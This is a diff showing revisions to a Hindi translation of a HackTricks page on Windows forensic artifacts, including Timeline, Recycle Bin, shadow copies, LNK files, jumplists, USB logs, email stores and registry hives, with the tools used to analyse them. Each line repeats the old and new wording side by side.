<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure> <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -30,7 +31,7 @@ HackTricks का समर्थन करने के अन्य तरी
### टाइमलाइन ### टाइमलाइन
टाइमलाइन एक Windows विशेषता है जो वेब पेजों के यातायात, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है। टाइमलाइन एक Windows विशेषता है जो वेब पेजों के दौरे, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है।
डेटाबेस पथ `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` में स्थित है। इस डेटाबेस को एक SQLite उपकरण के साथ खोला जा सकता है या उपकरण [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) के साथ जो 2 फ़ाइलें उत्पन्न करता है जो उपकरण [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) के साथ खोली जा सकती हैं। डेटाबेस पथ `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` में स्थित है। इस डेटाबेस को एक SQLite उपकरण के साथ खोला जा सकता है या उपकरण [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) के साथ जो 2 फ़ाइलें उत्पन्न करता है जो उपकरण [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) के साथ खोली जा सकती हैं।
@ -42,15 +43,15 @@ HackTricks का समर्थन करने के अन्य तरी
### रीसाइकल बिन ### रीसाइकल बिन
Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** को ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\
जब इस फ़ोल्डर में एक फ़ाइल हटाई जाती है तो 2 विशिष्ट फ़ाइलें बनाई जाती हैं: जब इस फ़ोल्डर में एक फ़ाइल हटाई जाती है तो 2 विशिष्ट फ़ाइलें बनाई जाती हैं:
* `$I{id}`: फ़ाइल सूचना (जब यह हटाई गई थी की तारीख} * `$I{id}`: फ़ाइल की जानकारी (जब यह हटाई गई थी की तारीख}
* `$R{id}`: फ़ाइल की सामग्री * `$R{id}`: फ़ाइल की सामग्री
![](<../../../.gitbook/assets/image (486).png>) ![](<../../../.gitbook/assets/image (486).png>)
इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)। इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista - Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)।
``` ```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
``` ```
@ -58,7 +59,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
### वॉल्यूम शैडो कॉपी ### वॉल्यूम शैडो कॉपी
शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉपियां** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों। शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉप** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों।
ये बैकअप्स आम तौर पर `\System Volume Information` में रूट फ़ाइल सिस्टम से स्थित होते हैं और उनका नाम निम्नलिखित छवि में दिखाए गए **UIDs** से मिलकर बनता है: ये बैकअप्स आम तौर पर `\System Volume Information` में रूट फ़ाइल सिस्टम से स्थित होते हैं और उनका नाम निम्नलिखित छवि में दिखाए गए **UIDs** से मिलकर बनता है:
@ -68,11 +69,11 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
![](<../../../.gitbook/assets/image (521).png>) ![](<../../../.gitbook/assets/image (521).png>)
रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजयों को शामिल करती है **जिन्हें बैकअप न करें**: रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजियों को शामिल करती है **जिन्हें बैकअप न करना** है:
![](<../../../.gitbook/assets/image (522).png>) ![](<../../../.gitbook/assets/image (522).png>)
रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉपियों` के बारे में विन्यास सूचना होती है। रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉप` के बारे में विन्यास सूचना होती है।
### ऑफिस ऑटोसेव्ड फ़ाइलें ### ऑफिस ऑटोसेव्ड फ़ाइलें
@ -84,16 +85,16 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
### हाल की दस्तावेज़ (LNK) ### हाल की दस्तावेज़ (LNK)
विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता एक फ़ाइल **खोलता है, उपयोग करता है या बनाता है**: विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता **फ़ाइल खोलता है, उपयोग करता है या बनाता है**:
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का भी बनाया जाता है। जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल बनाई जाती है, जिसमें फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का लिंक शामिल होता है।
ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी ती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने के लिए उपयोगी हो सकती है जिन्हें हटा दिया गया था ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी शामिल करती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने में सहायक हो सकती है जो हटा दी गई थीं
इसके अलावा, लिंक फ़ाइल क**निर्मित तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था। इसके अलावा, लिंक फ़ाइल क**निर्माण तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था।
इन फ़ाइलों की जांच करने के लिए आप [**LinkParser**](http://4discovery.com/our-tools/) का उपयोग कर सकते हैं। इन फ़ाइलों की जांच करने के लिए आप [**LinkParser**](http://4discovery.com/our-tools/) का उपयोग कर सकते हैं।
@ -108,7 +109,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
2. लिंक एक्सेस तिथि 2. लिंक एक्सेस तिथि
3. लिंक निर्माण तिथि। 3. लिंक निर्माण तिथि।
पहले सेट का टाइमस्टैम्प **फ़ाइल इसल्फ के टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट **लिंक की फ़ाइल के टाइमस्टैम्प्स** को संदर्भित करता है। पहले सेट का टाइमस्टैम्प फ़ाइल इसल्फ के **टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट लिंक फ़ाइल के **टाइमस्टैम्प्स** को संदर्भित करता है।
आप विंडोज CLI उपकरण चलाकर इसी जानकारी को प्राप्त कर सकते हैं: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) आप विंडोज CLI उपकरण चलाकर इसी जानकारी को प्राप्त कर सकते हैं: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
``` ```
@ -116,11 +117,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
``` ```
### जम्पलिस्ट्स ### जम्पलिस्ट्स
ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक ऐसी **सूची है जिसमें एक एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलें** हैं जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जा सकती हैं या कस्टम** हो सकती हैं। ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक **एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलों की सूची** है जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जाती हैं या कस्टम हो सकती हैं**
**स्वचालित रूप से बनाए गए जम्पलिस्ट्स** `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम इस प्रारूप का होता है `{id}.autmaticDestinations-ms` जहां प्रारंभिक आईडी एप्लिकेशन की आईडी होती है। **स्वचालित रूप से बनाए गए जम्पलिस्ट्स** `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम `{id}.autmaticDestinations-ms` नामक प्रारूप का होता है जहाँ प्रारंभिक आईडी एप्लिकेशन का आईडी होता है।
कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और न्हें एप्लिकेशन द्वारा सामान्यत: कुछ **महत्वपूर्ण** घटना होने के कारण बनाया जाता है (शायद पसंदीदा के रूप में चिह्नित किया गया हो) कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और न्हें एप्लिकेशन द्वारा सामान्यत: इसलिए बनाया जाता है क्योंकि कुछ **महत्वपूर्ण** घटना फ़ाइल के साथ हुई है (शायद पसंदीदा के रूप में चिह्नित किया गया हो)
किसी भी जम्पलिस्ट का **निर्माण समय** दर्शाता है **फ़ाइल तक पहुँचने का पहला समय** और **संशोधित समय** अंतिम बार। किसी भी जम्पलिस्ट का **निर्माण समय** दर्शाता है **फ़ाइल तक पहुँचने का पहला समय** और **संशोधित समय** अंतिम बार।
@ -128,11 +129,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
![](<../../../.gitbook/assets/image (474).png>) ![](<../../../.gitbook/assets/image (474).png>)
(_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित जम्पलिस्ट फ़ाइल से संबंधित हैं_) (_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित किए गए वक्त संबंधित होते हैं_)
### शेलबैग्स ### शेलबैग्स
[**इस लिंक पर जाएं और जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags) [**इस लिंक पर जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags)
## Windows USB का उपयोग ## Windows USB का उपयोग
@ -142,7 +143,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
* Microsoft Office हाल की फ़ोल्डर * Microsoft Office हाल की फ़ोल्डर
* जम्पलिस्ट्स * जम्पलिस्ट्स
ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय WPDNSE फ़ोल्डर को इंगित करती हैं: ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय, WPDNSE फ़ोल्डर को पॉइंट करती हैं:
![](<../../../.gitbook/assets/image (476).png>) ![](<../../../.gitbook/assets/image (476).png>)
@ -150,13 +151,13 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
### रजिस्ट्री सूचना ### रजिस्ट्री सूचना
[जानने के लिए इस पृष्ठ की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प जानकारी रखती हैं। [जानने के लिए इस पेज की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प सूचना रखती हैं।
### setupapi ### setupapi
USB कनेक्शन किया गया था कब हुआ यह जानने के लिए फ़ाइल `C:\Windows\inf\setupapi.dev.log` की जाँच करें (खोज करें `Section start`). USB कनेक्शन किया गया था कब हुआ यह जानने के लिए फ़ाइल `C:\Windows\inf\setupapi.dev.log` की जाँच करें (खोज करें `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB डिटेक्टिव ### USB डिटेक्टिव
@ -166,20 +167,20 @@ USB कनेक्शन किया गया था कब हुआ यह
### प्लग और प्ले सफाई ### प्लग और प्ले सफाई
'प्लग और प्ले सफाई' नामक निर्धारित कार्य को पुराने ड्राइवर संस्करणों को हटाने के लिए प्राथमिक रूप से डिज़ाइन किया गया है। नवीनतम ड्रावर पैकेज संस्करण को बनाए रखने के उसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स पर भी निशाना साधता है। इस परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं। 'प्लग और प्ले सफाई' नामक निर्धारित कार्य कारीय अपडेटेड ड्राइवर संस्करणों को हटाने के लिए प्रधान रूप से डिज़ाइन किया गया है। इसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स को भी लक्षित करता है। इसके परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं।
कार्य से संबंधित निम्नलिखित पथ पर स्थित है: कार्य का स्थान निम्नलिखित पथ पर है:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
कार्य की सामग्री का चित्र प्रदर्शित किया गया है: कार्य की सामग्री का चित्र प्रदान किया गया है:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**कार्य के मुख्य घटक और सेटिंग्स:** **कार्य के मुख्य घटक और सेटिंग्स:**
- **pnpclean.dll**: यह DLL वास्तविक सफाई प्रक्रिया के लिए जिम्मेदार है। - **pnpclean.dll**: यह DLL वास्तविक सफाई प्रक्रिया के लिए जिम्मेदार है।
- **UseUnifiedSchedulingEngine**: `TRUE` पर सेट किया गया है, जो सामान्य कार्य निर्धारण इंजन का उपयोग करने की संकेत करता है। - **UseUnifiedSchedulingEngine**: `TRUE` पर सेट किया गया है, जो सामान्य कार्य निर्धारण इंजन का उपयोग करने की संकेत करता है।
- **MaintenanceSettings**: - **MaintenanceSettings**:
- **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित स्वचालित रूप से मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है। - **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित ऑटोमैटिक रखरखाव के दौरान मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है।
- **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपातकालीन स्वचालित रूप से मासिक सफाई कार्य को करने के लिए निर्देशित करता है। - **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपात सफाई कार्य करने के लिए निर्देशित करता है।
यह विन्यास ड्राइवरों की नियमित रखरखाव और सफाई सुनिश्चित करता है, जो लगातार विफलताओं के मामले में कार्य को पुनः प्रयास करने के लिए प्रावधान करता है। यह विन्यास ड्राइवरों की नियमित रखरखाव और सफाई सुनिश्चित करता है, जो लगातार विफलताओं के मामले में कार्य को पुनः प्रयास करने के लिए प्रावधान करता है।
@ -187,75 +188,75 @@ USB कनेक्शन किया गया था कब हुआ यह
## ईमेल ## ईमेल
ईमेल में **2 दिलचस्प भाग होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे: ईमेल में **2 दिलचस्प हिस्से होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे:
* **कौन** ईमेल भेजा (ईमेल पता, आईपी, ईमेल को पुनर्निर्देशित करने वाले मेल सर्वर) * **कौन** ईमेल भेजा (ईमेल पता, आईपी, मेल सर्वर जिन्होंने ईमेल को पुनर्निर्देशित किया हो)
* **कब** ईमेल भेजा गया था * **कब** ईमेल भेजा गया था
इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप मेसेज की आईडी पा सकते हैं: इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप संदेशों का आईडी पा सकते हैं:
![](<../../../.gitbook/assets/image (484).png>) ![](<../../../.gitbook/assets/image (484).png>)
### Windows मेल ऐप ### Windows Mail App
यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को नीचे उपफ़ोल्डर में पा सकते हैं `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं। यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को ढूंढ सकते हैं `\Users\<username>\AppData\Local\Comms\Unistore\data\3\` के अंदर सबफ़ोल्डर्स में। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं।
ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** में पाया जा सकता है: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol` ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** के अंदर पाया जा सकता है: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` टेबल के अंदर आप ईमेल देख सकते हैं। फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` तालिका के अंदर आप ईमेल देख सकते हैं।
### Microsoft Outlook ### Microsoft Outlook
जब Exchange सर्वर या Outlook क्लाइंट का उपयोग किया जाता है तो कुछ MAPI हेडर्स होते हैं: जब Exchange सर्वर या Outlook क्लाइंट का उपयोग किया जाता है तो कुछ MAPI हेडर्स होते हैं:
* `Mapi-Client-Submit-Time`: ईमेल भेजे जाने का समय * `Mapi-Client-Submit-Time`: ईमेल भेजे जाने का समय
* `Mapi-Conversation-Index`: थ्रेड के बच्चों की संख्या और हर मेसेज के समय का चिन्हांक * `Mapi-Conversation-Index`: थ्रेड के बच्चों के संदेशों की संख्या और प्रत्येक संदेश का समयचिह्न
* `Mapi-Entry-ID`: मेसेज पहचानकर्ता। * `Mapi-Entry-ID`: संदेश पहचानकर्ता।
* `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (मेसेज पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? बाहर ऑफिस?) * `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (संदेश पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? आफिस से बाहर?)
Microsoft Outlook क्लाइंट में Microsoft Outlook क्लाइंट में, सभी भेजे गए/प्राप्त किए गए सं
### Microsoft Outlook OST Files ### Microsoft Outlook OST Files
एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया जाता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है। एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया गया होता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है।
### अटैचमेंट पुनः प्राप्त करना ### अटैचमेंट पुनः प्राप्त करना
खो गए अटैचमेंट को निम्नलिखित से पुनः प्राप्त किया जा सकता है: खो गए अटैचमेंट को निम्नलिखित स्थान से पुनः प्राप्त किया जा सकता है:
- **IE10 के लिए**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` - **IE10 के लिए**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- **IE11 और ऊपर के लिए**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` - **IE11 और ऊपर के लिए**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOX Files ### Thunderbird MBOX Files
**Thunderbird** डेटा संग्रहित करने के लिए **MBOX फ़ाइलें** का उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है। **Thunderbird** MBOX फ़ाइलें डेटा संग्रहित करने के लिए उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है।
### छवि थंबनेल्स ### छवि थंबनेल्स
- **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसके हटाने के बाद भी - **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर, एक `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसे हटा दिया गया हो
- **Windows 7/10**: `thumbs.db`त्पन्न होती है जब UNC पथ के माध्यम से नेटवर्क के माध्यम से पहुँचा जाता है। - **Windows 7/10**: `thumbs.db`स समय उत्पन्न होती है जब यह एक नेटवर्क के माध्यम से UNC पथ के माध्यम से पहुँचा जाता है।
- **Windows Vista और नएरे**: थंबनेल पूर्वावलोकन `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` में केंद्रीकृत है जिसमें फ़ाइलें **thumbcache\_xxx.db** नाम से होती हैं। [**Thumbsviewer**](https://thumbsviewer.github.io) और [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) इन फ़ाइलों को देखने के लिए उपकरण हैं। - **Windows Vista और नएरे**: थंबनेल पूर्वावलोकन `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` में केंद्रीकृत है जिसमें फ़ाइलें **thumbcache\_xxx.db** नाम से होती हैं। [**Thumbsviewer**](https://thumbsviewer.github.io) और [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) इन फ़ाइलों को देखने के लिए उपकरण हैं।
### Windows रजिस्ट्री सूचना ### Windows रजिस्ट्री जानकारी
Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए फ़ाइलों में संग्रहित व्यापक सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करता है: Windows रजिस्ट्री, विस्तृत सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करने वाला है, निम्नलिखि फ़इलों में समाहित है:
- विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए `%windir%\System32\Config` में - विभिन्न `HKEY_LOCAL_MACHINE` सबकीज के लिए `%windir%\System32\Config`
- `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT` में - `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT`
- Windows Vista और उसके बाद के संस्करण `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलें बैकअप करते हैं - Windows Vista और उसके बाद के संस्करण ने `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलों का बैकअप बनाया
- इसके अतिरिक्त, कार्यक्रम निष्पादन सूचना `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है Windows Vista और Windows 2008 सर्वर के बाद से - इसके अतिरिक्त, कार्यक्रम निष्पादन जानकारी Windows Vista और Windows 2008 सर्वर के बाद से `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है।
### उपकरण ### उपकरण
कुछ उपकरण रजिस्ट्री फ़ाइलों का विश्लेषण करने के लिए उपयोगी हैं: कुछ उपकरण रजिस्ट्री फ़ाइलों का विश्लेषण करने के लिए उपयोगी हैं:
* **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र क Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है। * **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र क Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है।
* [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है एक GUI के साथ। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है। * [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है।
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): फिर से, इसमें एक GUI है जो लोड किए गए रजिस्ट्री में नेविगेट करने की अनुमति देता है और लोड किए गए रजिस्ट्री में दिलचस्प जानकारी को हाइलाइट करने वाले प्लगइन्स भी शामिल हैं। * [**RegRipper**](https://github.com/keydet89/RegRipper3.0): फिर से, इसमें एक GUI है जो लोड किए गए रजिस्ट्री में नेविगेट करने की अनुमति देता है और लोड किए गए रजिस्ट्री में दिलचस्प जानकारी को हाइलाइट करने वाले प्लगइन्स भी शामिल हैं।
* [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने की क्षमता रखता है। * [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने में सक्षम है।
